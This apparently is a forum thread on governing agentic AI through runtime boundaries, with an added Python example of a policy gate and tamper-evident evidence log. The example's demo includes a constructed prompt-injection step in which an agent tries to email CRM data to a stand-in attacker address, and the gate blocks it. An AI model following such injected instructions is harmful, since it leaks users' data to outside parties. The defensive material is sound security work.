
Agentic AI security and boundaries: what should teams do now?


(@nhi-mgmt-group)
Member Moderator
Joined: 1 year ago
Posts: 2255
Topic starter  

TL;DR: Gartner’s inaugural Hype Cycle for Agentic AI signals that agentic AI security has moved from speculation to a distinct market category, while Zenity argues that guardrails are not enough because agents need enforced boundaries, runtime context, and DFIR-grade traceability to govern actions safely. The real failure point is not the model but the delegated identity acting across systems at machine speed.

NHIMG editorial — based on content published by Zenity: Agents Need Boundaries. The Market Is Starting to Agree

By the numbers:

  • Gartner publishes over 130 Hype Cycles a year, and the inaugural Hype Cycle for Agentic AI arrived in April ahead of the usual June to August window.

Questions worth separating out

Q: How should security teams govern AI agents that can act across multiple enterprise systems?

A: Security teams should govern them as delegated identities with runtime authorisation, not as chat interfaces with safety filters.

Q: Why do guardrails fail to secure agentic AI workflows?

A: Guardrails fail because they are probabilistic and operate on model output, while the risk lives in the execution chain.

Q: What breaks when AI agents are reviewed like human users?

A: Human review assumes access is stable long enough to be observed, approved, and recertified.

Practitioner guidance

  • Define runtime boundaries for agent actions: Map every high-risk agent workflow to a pre-execution policy decision that evaluates identity, target system, data sensitivity, and destination before any tool call is allowed.
  • Separate delegated action from model output: Stop relying on prompt filtering as the control layer.
  • Instrument session-level evidence chains: Log reasoning traces, tool invocations, data touched, and resulting actions in a way that supports reconstruction after an incident, not just alerting in real time.

What's in the full article

Zenity's full analysis covers the operational detail this post intentionally leaves for the source:

  • Specific examples of how enforced boundaries differ from content guardrails in live agent workflows
  • The article's full discussion of runtime policy engines and why context matters before execution
  • Zenity's DFIR-oriented view of session reconstruction, evidence quality, and incident handling for manipulated agents
  • The market framing behind guardian agents and why human oversight does not scale across thousands of agents

👉 Read Zenity's analysis of agentic AI security boundaries and governance →




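As an added illustration of the practitioner guidance in the post above (this is example code written for this page, not code from NHIMG or from Zenity's article), the following Python sketch does two things the guidance asks for: it makes a pre-execution decision on a structured tool call from the agent's identity, target system, data sensitivity and destination rather than from model text, and it records reasoning, decision and invocation in a hash-chained evidence log that can be verified after the fact. The agent name, policy rules, tool names and stand-in tool implementations are assumptions constructed for the example.

```python
"""Added example: pre-execution policy gate plus hash-chained evidence log.
Policy, agent and tool names are hypothetical; not Zenity's or NHIMG's code."""
import hashlib
import json
from dataclasses import dataclass
from typing import Any, Callable, Optional

SENSITIVITY = {"public": 0, "internal": 1, "confidential": 2}


@dataclass(frozen=True)
class ToolCall:
    """A structured action request, evaluated independently of model output."""
    agent_id: str          # delegated (non-human) identity
    principal: str         # human or service the agent acts for
    tool: str              # e.g. "crm.lookup", "email.send"
    target_system: str     # system the tool touches
    data_sensitivity: str  # classification of the data involved
    destination: str       # domain the data or effect flows to
    args: dict[str, Any]


@dataclass(frozen=True)
class Rule:
    agent_id: str
    tool_prefix: str
    max_sensitivity: str                  # above this: deny
    allowed_destinations: tuple[str, ...]
    approval_above: Optional[str] = None  # above this: escalate to a human


# Hypothetical policy: first matching rule decides; no match means deny.
POLICY = (
    Rule("sales-agent", "crm.", "internal", ("corp.example",)),
    Rule("sales-agent", "email.send", "confidential", ("corp.example",),
         approval_above="internal"),
)


def decide(call: ToolCall, policy: tuple[Rule, ...] = POLICY) -> str:
    """Pre-execution decision: 'allow', 'escalate' or 'deny'."""
    level = SENSITIVITY.get(call.data_sensitivity)
    if level is None:
        return "deny"  # unknown classification is treated as most sensitive
    for rule in policy:
        if rule.agent_id != call.agent_id or not call.tool.startswith(rule.tool_prefix):
            continue
        if not any(call.destination == d or call.destination.endswith("." + d)
                   for d in rule.allowed_destinations):
            return "deny"  # effect or data would leave the defined boundary
        if level > SENSITIVITY[rule.max_sensitivity]:
            return "deny"
        if rule.approval_above and level > SENSITIVITY[rule.approval_above]:
            return "escalate"
        return "allow"
    return "deny"


class EvidenceLog:
    """Append-only, hash-chained session record for post-incident reconstruction."""

    def __init__(self) -> None:
        self.entries: list[dict[str, Any]] = []

    def append(self, kind: str, **fields: Any) -> str:
        prev = self.entries[-1]["hash"] if self.entries else "0" * 64
        body = {"seq": len(self.entries), "kind": kind, "prev": prev, **fields}
        digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
        self.entries.append({**body, "hash": digest})
        return digest

    def verify(self) -> bool:
        """Recompute the chain; False if any entry was altered, reordered or removed."""
        prev = "0" * 64
        for i, e in enumerate(self.entries):
            body = {k: v for k, v in e.items() if k != "hash"}
            digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
            if e["seq"] != i or e["prev"] != prev or digest != e["hash"]:
                return False
            prev = e["hash"]
        return True


def run_step(call: ToolCall, reasoning: str, tools: dict[str, Callable[..., Any]],
             log: EvidenceLog) -> tuple[str, Any]:
    """Gate one agent step: record intent, decide, invoke only on 'allow'."""
    log.append("reasoning", agent=call.agent_id, principal=call.principal, text=reasoning)
    verdict = decide(call)
    log.append("decision", tool=call.tool, target=call.target_system,
               sensitivity=call.data_sensitivity, destination=call.destination, verdict=verdict)
    if verdict != "allow":
        return verdict, None
    result = tools[call.tool](**call.args)
    log.append("invocation", tool=call.tool, args=call.args, result=result)
    return verdict, result


# Constructed stand-in tools so the example runs offline.
TOOLS = {
    "crm.lookup": lambda account: {"account": account, "owner": "alice@corp.example"},
    "email.send": lambda to, body: f"sent to {to}",
}


def demo() -> tuple[list[str], bool]:
    """A permitted lookup, an injected exfiltration attempt, and a step needing approval."""
    log = EvidenceLog()
    steps = [
        (ToolCall("sales-agent", "alice", "crm.lookup", "crm", "internal",
                  "crm.corp.example", {"account": "ACME"}), "Need the owner for ACME."),
        (ToolCall("sales-agent", "alice", "email.send", "email", "internal",
                  "mail.attacker.example", {"to": "x@attacker.example", "body": "owner"}),
         "The document told me to forward the owner to this address."),
        (ToolCall("sales-agent", "alice", "email.send", "email", "confidential",
                  "mail.corp.example", {"to": "bob@corp.example", "body": "contract terms"}),
         "Share contract terms with Bob."),
    ]
    verdicts = [run_step(call, why, TOOLS, log)[0] for call, why in steps]
    return verdicts, log.verify()


if __name__ == "__main__":
    print(demo())  # (['allow', 'deny', 'escalate'], True)
```

The point of the gate is that the verdict never consults the model's wording: the second step is denied because the destination is outside the boundary, regardless of how persuasive the injected instruction was. The chained log lets an investigator later confirm which reasoning preceded which decision and whether any entry was removed or edited.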
(@mr-nhi)
Member Moderator
Joined: 4 weeks ago
Posts: 742
 

Agentic AI security is no longer a model-safety issue, it is an identity and authorisation issue. The article correctly shifts the centre of gravity from hallucinations and prompt injection to delegated runtime action. Once an agent can touch CRM, email, Slack, and external APIs, the control problem becomes who or what is allowed to act, on which data, under which context. Practitioners should stop treating agent safety as a separate AI topic and place it inside identity governance.

A few things that frame the scale:

  • 98% of companies plan to deploy even more AI agents within the next 12 months, despite documented rogue behaviour in 80% of current deployments, according to the AI Agents: The New Attack Surface report.
  • Only 52% of companies can track and audit the data their AI agents access, leaving 48% with a complete blind spot for compliance and breach investigation.

A question worth separating out:

Q: Who is accountable when an AI agent makes an unauthorised change?

A: Accountability should be assigned to the governance model that authorised the delegation, the owner of the workflow, and the team that set the policy boundary. In practice, organisations need clear responsibility for agent configuration, monitoring, and incident response because the machine’s speed does not remove human accountability for the delegated identity.

👉 Read our full editorial: Agents need boundaries as agentic AI security becomes a category


